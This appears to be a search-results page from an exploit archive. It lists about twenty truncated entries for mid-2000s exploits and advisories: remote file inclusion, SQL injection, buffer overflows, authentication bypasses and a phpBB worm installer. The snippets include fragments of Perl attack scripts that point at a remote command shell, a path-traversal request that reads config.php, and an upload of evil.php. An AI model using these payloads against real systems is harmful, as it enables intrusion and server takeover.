149 matches found
RedBLoG 0.5 - 'common.php?root_path' Remote File Inclusion
source: https://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system...
Fast Click 1.1.3/2.3.8 - 'show.php' Remote File Inclusion
!/usr/bin/perl Fast Click perl fc.pl http://target.com/fclick/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell...
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow
Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow / THCsnortbo 0.3 - Snort BackOrifice PING exploit by [email protected] THC PUBLIC SOURCE MATERIALS Bug was found by Internet Security Systems http://xforce.iss.net/xforce/alerts/id/207 v0.3 - removed/cleaned up info for public release v0.2 -...
f3r4.txt
Escrito por: F3R4R4PP3R [email protected] Brasil 2005 Data: 22/05/2005 + ............. Sala 14 .................. + + + + Produto: INMOLUXE Premium + + versão: 2.0 + + VULNERABILIDADE TIPO: SQL injection + + Url vendedor: http://www.inmoluxe.com + + + + ........................................ +...
Internet Download Manager 4.0.5 - Input URL Stack Overflow
/ Title : Internet Download Manager = 4.05 universal remote overflow Exploit bug analyse and exploit code by : c0d3r "Kaveh Razavi" [email protected] my advisory : http://www.ihsteam.com/advisory/downloadmanageradv.txt this bug is differnt from what was found in application called altnet download...
includer10.pl.txt
Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print " incl10.pl 127.0.0.1 / "uname -a"\n"; print " incl10.pl...
MS Windows (WINS) Remote Buffer Overflow Exploit (v.3)
Exploit for unknown platform in category remote exploits ====================================================== MS Windows WINS Remote Buffer Overflow Exploit v.3 ====================================================== / Windows Internet Name Service WINS Remote Heap Buffer Overflow...
Microsoft Windows - WINS Remote Buffer Overflow (MS04-045) (3)
Microsoft Windows - WINS Remote Buffer Overflow MS04-045 3 / Windows Internet Name Service WINS Remote Heap Buffer Overflow ------------------------------------ ------------------------------------ Advisory credits: ---------------- Nicolas Waisman of Immunity Inc. www.immunitysec.com Advisory...
Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) (3)
/ Windows Internet Name Service WINS Remote Heap Buffer Overflow ------------------------------------ ------------------------------------ Advisory credits: ---------------- Nicolas Waisman of Immunity Inc. www.immunitysec.com Advisory link: ----------------...
ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit
Exploit for unknown platform in category web applications =============================================================== ACNews = 1.0 Admin Authentication Bypass SQL Injection Exploit ===============================================================...
PHP-FUSION 5.* XSS VULNERABILITY
I found an exploit in the current version of php-fusion which allows you to input XSS in the IMG tag. I reported it already to php-fusion and they created a fix for this. Here it goes: By converting the text ie. javascript:alert'test' to their ascii values, the strings between the img/img tags...
phpBB 2.0.12 Session Handling Administrator Authentication Bypass -SIMPLIFIED-
----------------------------------- phpBB 2.0.12 Session Handling Administrator Authentication Bypass EXPLOIT -SIMPLIFIED- - By PPC^Rebyte ----------------------------------- 03maa2005 NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW ENGLISH VERSION Status phpBB has already been informed about...
[ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]
Postnuke all versions + pnphpbb =1.2 sql injection - jocanor Author: Jocanor Date: 01-03-2k5 1. -----------introduction--------. Postnuke is an open source CMS content management system, originally based in php-nuke. www.postnuke.com pnphpbb is a module for postnuke based in popular forum system...
adpl33t.txt
Adp Elite system is an invoice/purchase order suite very common in car dealerships. It's a telnet based system. When a user logs in via telnet, adp dumps the user into the program where the user can check on a vehicle's status, generate PO's and RO's, etc.... The program is rather large and runs ...
WebWasherCONNECT.txt
WebWasher Classic - HTTP CONNECT weakness ========================================= WebWasher Classic ================= WebWasher Classic is a well known HTTP-URL/Popup/Script filtering proxy which is free for non commercial use. WebWasher Classic supports two modes, a client mode, where it only...
phpBB 2.0.10 - ssh.D.Worm Bot Install Altavista
phpBB 2.0.10 - ssh.D.Worm Bot Install Altavista !/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL";...
QWikiwiki Directory Traversal Vulnerability
No description provided by source. REQUEST: http://SERVER/qwiki/index.php?page=../config.php%00 milw0rm.com 2005-01-04...
e107 - include() Remote File Upload
e107 - include Remote File Upload | | | | | | |/ \ \ /\ / / | | | | \ V V / || ||/ // Security Group. -= e107 remote sploit =- by sysbug Attack method: with this sploit u can send an include vuln to a Host victim the upload go to /images/evil.php C:\Perl\binperl sploit.pl www.site.com -= e107...
TWiki 20030201 - search.pm Remote Command Execution
TWiki 20030201 - search.pm Remote Command Execution !/usr/bin/perl "tweaky.pl" v. 1.0 beta 2 Proof of concept for TWiki vulnerability. Remote code execution Vuln discovered, researched and exploited by RoMaNSoFt Madrid, 30.Sep.2004. require LWP::UserAgent; use Getopt::Long; Default config $host =...
AppServ 2.5.x and Prior Exploit
what AppServ ========== AppServ is the Apache/PHP/MySQL open source software installer packages. Objective : - Easy to buid Webserver and Database Server - For those who just beginning client/server programming. - For web programmers/developers using PHP & MySQL. - For programming techniques that...